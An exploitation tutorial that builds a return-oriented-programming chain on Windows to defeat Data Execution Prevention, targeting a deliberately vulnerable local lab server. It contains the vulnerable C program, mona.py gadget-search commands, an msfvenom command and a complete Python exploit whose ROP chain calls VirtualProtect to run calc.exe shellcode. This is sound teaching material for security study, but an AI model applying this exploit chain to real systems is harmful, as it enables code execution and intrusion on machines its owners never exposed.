Tutorial

Bypassing DEP with ROP on Windows

Build a ROP chain on Windows to bypass Data Execution Prevention, using mona.py to find gadgets and VirtualProtect to mark shellcode executable.

5 min read advanced

Prerequisites

  • Completion of the Windows Stack Buffer Overflow tutorial
  • Understanding of ROP concepts (see the Linux ROP tutorials)
  • Familiarity with Immunity Debugger and mona.py
  • Basic knowledge of Windows API calling conventions

Part 4 of 7 in Windows Exploitation

Table of Contents

The first three tutorials in this series exploited binaries where the stack was executable. That era is over. Every modern Windows binary ships with DEP (Data Execution Prevention) enabled, which marks the stack and heap as non-executable. Shellcode placed on the stack will trigger an access violation instead of running.

The bypass is the same idea as on Linux: return-oriented programming. Instead of executing injected code, you chain together short instruction sequences (“gadgets”) that already exist in executable memory, typically in loaded DLLs, to call a Windows API function that makes your shellcode’s memory region executable. Then you jump to it.

On Windows, the two most common targets are VirtualProtect (change page permissions on existing memory) and VirtualAlloc (allocate a new executable region and copy shellcode into it). This tutorial uses VirtualProtect because the shellcode is already on the stack; you just need to flip the page from PAGE_READWRITE to PAGE_EXECUTE_READWRITE.

Without DEP bypass:

  Stack:
  +--------+---------+------------+
  | Junk   | JMP ESP | Shellcode  |  → ACCESS VIOLATION (NX bit set)
  +--------+---------+------------+

With ROP chain:

  Stack:
  +--------+-----------------------------+------------+
  | Junk   | ROP chain → VirtualProtect  | Shellcode  |  → VirtualProtect makes
  +--------+-----------------------------+------------+    stack executable, then
                                                           shellcode runs

Lab setup

Use the same Windows environment from previous tutorials:

  • Windows 11 (32-bit or WoW64 process)
  • Immunity Debugger with mona.py installed
  • A vulnerable application compiled with DEP enabled and ASLR disabled

For a controlled target, compile a simple vulnerable server with DEP on and ASLR off:

// vuln_dep.c — compile with: cl /GS- vuln_dep.c /link /NXCOMPAT /DYNAMICBASE:NO ws2_32.lib
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

void handle_client(SOCKET client) {
    char buf[512];
    int len = recv(client, buf, 2048, 0);  // overflow: 2048 into 512
    printf("Received %d bytes\n", len);
}

int main() {
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(9999);
    addr.sin_addr.s_addr = INADDR_ANY;

    bind(s, (struct sockaddr *)&addr, sizeof(addr));
    listen(s, 5);
    printf("Listening on port 9999...\n");

    while (1) {
        SOCKET client = accept(s, NULL, NULL);
        handle_client(client);
        closesocket(client);
    }
}

The /NXCOMPAT flag enables DEP. /DYNAMICBASE:NO disables ASLR so we can focus on the DEP bypass without address randomization (that’s the next tutorial).

Note

If you don’t have Visual Studio, use MinGW: gcc -o vuln_dep.exe vuln_dep.c -lws2_32 -Wl,--nxcompat,--no-dynamicbase. Verify DEP is enabled by checking the PE header with dumpbin /headers vuln_dep.exe or inspecting in Immunity.

Confirming DEP is active

Attach Immunity Debugger to the running process. Before building the exploit, verify DEP status:

!mona modules

Look at the DEP column in the output. You can also check at the process level:

Debug → Select process → check "DEP" column

Send an initial overflow to confirm the crash:

#!/usr/bin/env python3
import socket

payload = b"A" * 524 + b"BBBB" + b"\xcc" * 200  # INT3 sled after EIP

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.sendall(payload)
s.close()

In Immunity, you’ll see EIP overwritten with 42424242, but if you replace BBBB with a JMP ESP address and place shellcode after it, execution hits a DEP violation:

Access violation when executing [0019FA6C] — NX page fault

DEP is working. The stack is not executable.

Understanding VirtualProtect

VirtualProtect is the Windows API function that changes memory page permissions. Its signature:

BOOL VirtualProtect(
    LPVOID lpAddress,       // Address of the region to change
    SIZE_T dwSize,          // Size of the region in bytes
    DWORD  flNewProtect,    // New protection flags (0x40 = PAGE_EXECUTE_READWRITE)
    PDWORD lpflOldProtect   // Pointer to receive the old protection value
);

To bypass DEP, the ROP chain needs to:

  1. Set up the four arguments to VirtualProtect on the stack or in registers
  2. Call VirtualProtect with lpAddress pointing to the shellcode, dwSize large enough to cover it, and flNewProtect = 0x40
  3. After VirtualProtect returns, redirect execution to the now-executable shellcode

The lpflOldProtect parameter requires a writable address; any writable location in the process works (a global variable, a .data section address). VirtualProtect writes the old protection value there.

ROP chain layout on the stack:

  ESP →  +---------------------------+
         | VirtualProtect address    |  ← function to call
         +---------------------------+
         | Return address (→shellcode)|  ← where to go after VP returns
         +---------------------------+
         | lpAddress (ESP / shellcode)|  ← arg 1: memory to make executable
         +---------------------------+
         | dwSize (0x400)            |  ← arg 2: size
         +---------------------------+
         | flNewProtect (0x40)       |  ← arg 3: PAGE_EXECUTE_READWRITE
         +---------------------------+
         | lpflOldProtect (writable) |  ← arg 4: any writable address
         +---------------------------+
         | NOP sled + Shellcode      |
         +---------------------------+

Finding gadgets with mona

Configure mona’s working directory:

!mona config -set workingfolder C:\mona\%p

Locating VirtualProtect

!mona iat -s VirtualProtect

This searches the Import Address Table for VirtualProtect. The output shows the address of the IAT entry, which contains a pointer to the actual function.

0x12345678  kernel32.VirtualProtect  (Module: vuln_dep.exe)

Finding a non-ASLR module for gadgets

!mona modules

Look for modules with ASLR disabled (False in the ASLR column) and no bad characters in their base addresses. The vulnerable executable itself and any DLLs it loads without ASLR are candidates.

Module        Base       ASLR    DEP    SafeSEH
vuln_dep.exe  0x00400000 False   True   False
MSVCRT.dll    0x77C10000 False   True   False

Generating the ROP chain

Mona can automatically generate a ROP chain for common DEP bypasses:

!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d"

This searches the specified modules for gadgets and attempts to construct a complete chain. The -cpb flag excludes bad characters. Mona generates several chain variants in rop_chains.txt and rop.txt.

!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d" -n

The -n flag skips modules with null bytes in their base address.

Review C:\mona\vuln_dep\rop_chains.txt. Mona produces Python-ready output:

# mona.py ROP chain for VirtualProtect (example output)
def create_rop_chain():
    rop_gadgets = [
        # rop chain generated by mona.py
        0x77c31e24,  # POP EAX # RETN  [MSVCRT.dll]
        0x77c11120,  # ptr to &VirtualProtect() [IAT MSVCRT.dll]
        0x77c31e70,  # MOV EAX,DWORD PTR DS:[EAX] # RETN  [MSVCRT.dll]
        0x77c12df9,  # XCHG EAX,ESI # RETN  [MSVCRT.dll]
        0x77c31e24,  # POP EAX # RETN  [MSVCRT.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201 (513 bytes)
        0x77c353c3,  # NEG EAX # RETN  [MSVCRT.dll]
        0x77c12df8,  # XCHG EAX,EBX # RETN  [MSVCRT.dll]  — dwSize
        0x77c31e24,  # POP EAX # RETN
        0xffffffc0,  # Value to negate, becomes 0x00000040
        0x77c353c3,  # NEG EAX # RETN  — flNewProtect = PAGE_EXECUTE_READWRITE
        0x77c12e01,  # XCHG EAX,EDX # RETN  [MSVCRT.dll]
        0x77c34a10,  # POP ECX # RETN  [MSVCRT.dll]
        0x77c5f030,  # &Writable location [MSVCRT.dll .data]  — lpflOldProtect
        0x77c34a14,  # POP EDI # RETN  [MSVCRT.dll]
        0x77c353c4,  # RETN (ROP NOP)  [MSVCRT.dll]
        0x77c31e24,  # POP EAX # RETN  [MSVCRT.dll]
        0x90909090,  # NOP
        0x77c12e08,  # PUSHAD # RETN  [MSVCRT.dll]
        # PUSHAD pushes: EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI
        # This places all our prepared values onto the stack in the right
        # order for VirtualProtect's stdcall convention
    ]
    return b''.join(p.to_bytes(4, 'little') for p in rop_gadgets)

How the chain works

The chain uses an indirect approach because directly placing arguments on the stack with null bytes would break the exploit. Instead:

  1. Load VirtualProtect address, POP the IAT pointer into EAX, dereference it to get the actual function address, move it into ESI
  2. Set dwSize, POP a negative value into EAX, negate it (avoids null bytes), move to EBX
  3. Set flNewProtect, Same trick: POP negative of 0x40, negate, move to EDX
  4. Set lpflOldProtect, POP a writable .data address into ECX
  5. PUSHAD, Push all registers onto the stack in the order: EAX, ECX, EDX, EBX, ESP (lpAddress!), EBP, ESI (VirtualProtect), EDI (return ROP NOP). This constructs the VirtualProtect call frame automatically

The PUSHAD trick is elegant: by loading specific values into specific registers and then pushing them all at once, the stack ends up with VirtualProtect’s arguments in exactly the right positions for the stdcall calling convention.

After PUSHAD, the stack looks like:

  ESP →  +---------------------------+
         | EDI = RETN gadget         |  ← VirtualProtect returns here
         +---------------------------+
         | ESI = &VirtualProtect     |  ← called via RETN
         +---------------------------+
         | EBP (don't care)          |
         +---------------------------+
         | ESP = stack addr          |  ← lpAddress (points to shellcode below)
         +---------------------------+
         | EBX = 0x201               |  ← dwSize
         +---------------------------+
         | EDX = 0x40                |  ← flNewProtect
         +---------------------------+
         | ECX = writable addr       |  ← lpflOldProtect
         +---------------------------+
         | EAX = 0x90909090          |  ← NOP sled (start of shellcode region)
         +---------------------------+
         | Shellcode continues...    |
         +---------------------------+

Identifying bad characters

Follow the same process from previous tutorials:

!mona bytearray -b "\x00"
!mona compare -f C:\mona\vuln_dep\bytearray.bin -a <address>

For a network service, typical bad characters include:

\x00  — null byte (string terminator)
\x0a  — newline (protocol parsing)
\x0d  — carriage return (protocol parsing)

The negation trick in the ROP chain avoids null bytes in arguments like 0x00000040 (flNewProtect), instead we POP 0xffffffc0 and negate it.

Complete exploit

Generate a real payload first and save it next to the exploit as shellcode.py:

msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f python -v shellcode > shellcode.py
#!/usr/bin/env python3
import socket
import struct
from shellcode import shellcode

pack = lambda x: struct.pack('<I', x)

# Bad chars: \x00\x0a\x0d

offset = 524  # bytes to EIP

# ROP chain — VirtualProtect via PUSHAD technique
# Addresses from mona output (adjust for your environment)
rop_chain = b""
rop_chain += pack(0x77c31e24)  # POP EAX # RETN
rop_chain += pack(0x77c11120)  # ptr to &VirtualProtect() [IAT]
rop_chain += pack(0x77c31e70)  # MOV EAX,[EAX] # RETN — dereference IAT
rop_chain += pack(0x77c12df9)  # XCHG EAX,ESI # RETN — ESI = VirtualProtect
rop_chain += pack(0x77c31e24)  # POP EAX # RETN
rop_chain += pack(0xfffffdff)  # -0x201 (will be negated to 0x201 = 513 bytes)
rop_chain += pack(0x77c353c3)  # NEG EAX # RETN — EAX = 0x201
rop_chain += pack(0x77c12df8)  # XCHG EAX,EBX # RETN — EBX = dwSize
rop_chain += pack(0x77c31e24)  # POP EAX # RETN
rop_chain += pack(0xffffffc0)  # -0x40 (will be negated to 0x40)
rop_chain += pack(0x77c353c3)  # NEG EAX # RETN — EAX = 0x40
rop_chain += pack(0x77c12e01)  # XCHG EAX,EDX # RETN — EDX = flNewProtect
rop_chain += pack(0x77c34a10)  # POP ECX # RETN
rop_chain += pack(0x77c5f030)  # writable .data address — lpflOldProtect
rop_chain += pack(0x77c34a14)  # POP EDI # RETN
rop_chain += pack(0x77c353c4)  # RETN (ROP NOP) — return address after VirtualProtect
rop_chain += pack(0x77c31e24)  # POP EAX # RETN
rop_chain += pack(0x90909090)  # NOP sled (will land in shellcode area)
rop_chain += pack(0x77c12e08)  # PUSHAD # RETN — sets up VirtualProtect call frame

# NOP sled + shellcode
nop_sled = b"\x90" * 16

payload = b"A" * offset
payload += rop_chain
payload += nop_sled
payload += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.sendall(payload)
s.close()

Execution flow

1. Overflow buf[512] with 2048 bytes via recv()

2. EIP overwritten with first gadget address (POP EAX # RETN)

3. ROP chain executes:
   a. Load VirtualProtect address from IAT → ESI
   b. Set dwSize = 0x201 → EBX (via negate trick)
   c. Set flNewProtect = 0x40 → EDX (via negate trick)
   d. Set lpflOldProtect = writable .data addr → ECX
   e. Set EAX = 0x90909090 (NOP for shellcode area)
   f. PUSHAD constructs the call frame

4. RETN into ESI → VirtualProtect executes
   - Changes stack page from RW to RWX

5. VirtualProtect returns to the RETN gadget (EDI)
   - Which returns into the NOP sled on the (now executable) stack

6. Shellcode executes

Debugging the ROP chain

When the chain doesn’t work on the first try (it usually doesn’t), systematic debugging in Immunity is essential.

Setting breakpoints on gadgets

Set a breakpoint on the first gadget in your chain:

bp 0x77c31e24

Run the exploit. When it breaks, step through with F7 (step into) and verify each gadget does what you expect.

Watching register state

After each gadget executes, check that the target register holds the expected value. In the Registers window:

After POP EAX # RETN:    EAX should contain the IAT pointer
After MOV EAX,[EAX]:     EAX should contain &VirtualProtect
After XCHG EAX,ESI:      ESI should contain &VirtualProtect
...

Common failures

VirtualProtect returns 0 (failure). Check the arguments: lpAddress must be page-aligned or within the target page, dwSize must be > 0, and lpflOldProtect must point to a writable address. Use !mona find -s "\x00\x00\x00\x00" -type rw to find writable locations.

Chain crashes mid-execution. A gadget has a side effect you didn’t account for. Check if any gadget clobbers a register that a later gadget depends on. Step through each gadget and note all register changes, not just the intended one.

Shellcode still triggers DEP. VirtualProtect was called with the wrong lpAddress. The ESP value captured by PUSHAD might not point to your shellcode. Adjust the NOP sled size or add a stack adjustment gadget before the shellcode.

VirtualAlloc alternative

If VirtualProtect isn’t available or practical, VirtualAlloc allocates a new executable memory region:

LPVOID VirtualAlloc(
    LPVOID lpAddress,      // NULL (let the system choose)
    SIZE_T dwSize,         // Size of region
    DWORD  flAllocationType, // 0x1000 (MEM_COMMIT)
    DWORD  flProtect       // 0x40 (PAGE_EXECUTE_READWRITE)
);

The chain is slightly more complex because you need to copy shellcode from the stack into the newly allocated region. The typical approach:

  1. Call VirtualAlloc to get an RWX region
  2. Use a memcpy gadget or a series of MOV [reg], reg gadgets to copy shellcode
  3. Jump to the allocated region

Mona can generate this variant too:

!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d" -rva

WriteProcessMemory alternative

A third option is WriteProcessMemory, which copies data to any writable region, including .text sections of loaded modules (which are executable by default):

BOOL WriteProcessMemory(
    HANDLE  hProcess,       // -1 (current process, pseudo-handle)
    LPVOID  lpBaseAddress,  // destination in executable memory
    LPCVOID lpBuffer,       // source (shellcode on stack)
    SIZE_T  nSize,          // size of shellcode
    SIZE_T  *lpNumberOfBytesWritten  // output parameter
);

This avoids changing page permissions entirely; you write shellcode over existing executable code.

Tips and troubleshooting

Gadget alignment

On Windows x86, the stdcall convention expects the callee to clean up the stack. If your ROP chain doesn’t account for this, the stack will be misaligned after the API call returns. The PUSHAD technique handles this automatically, but manual chains need careful stack management.

DEP opt-in vs opt-out

Windows DEP has two modes:

  • OptIn, only protects processes that explicitly request it (default on client Windows)
  • OptOut, protects all processes except those explicitly excluded (default on Server)

Check the system policy: bcdedit /enum | findstr nx. For testing, set OptOut to ensure DEP is active for your target.

Permanent DEP via SetProcessDEPPolicy

Some applications call SetProcessDEPPolicy(PROCESS_DEP_ENABLE | PROCESS_DEP_DISABLE_ATI_THUNK_EMULATION) to enable permanent DEP. This makes VirtualProtect fail for stack addresses on some configurations. In that case, use VirtualAlloc or WriteProcessMemory instead.

ROP chain size

The ROP chain for VirtualProtect with the PUSHAD technique is typically 76-100 bytes. Add the NOP sled and shellcode (~220 bytes for a reverse shell), and you need about 400 bytes of controllable stack space after EIP. If space is limited, consider a two-stage approach: use a minimal ROP chain to call VirtualProtect on a larger buffer elsewhere in memory where you’ve placed the full shellcode (similar to the egghunter concept from the previous tutorial).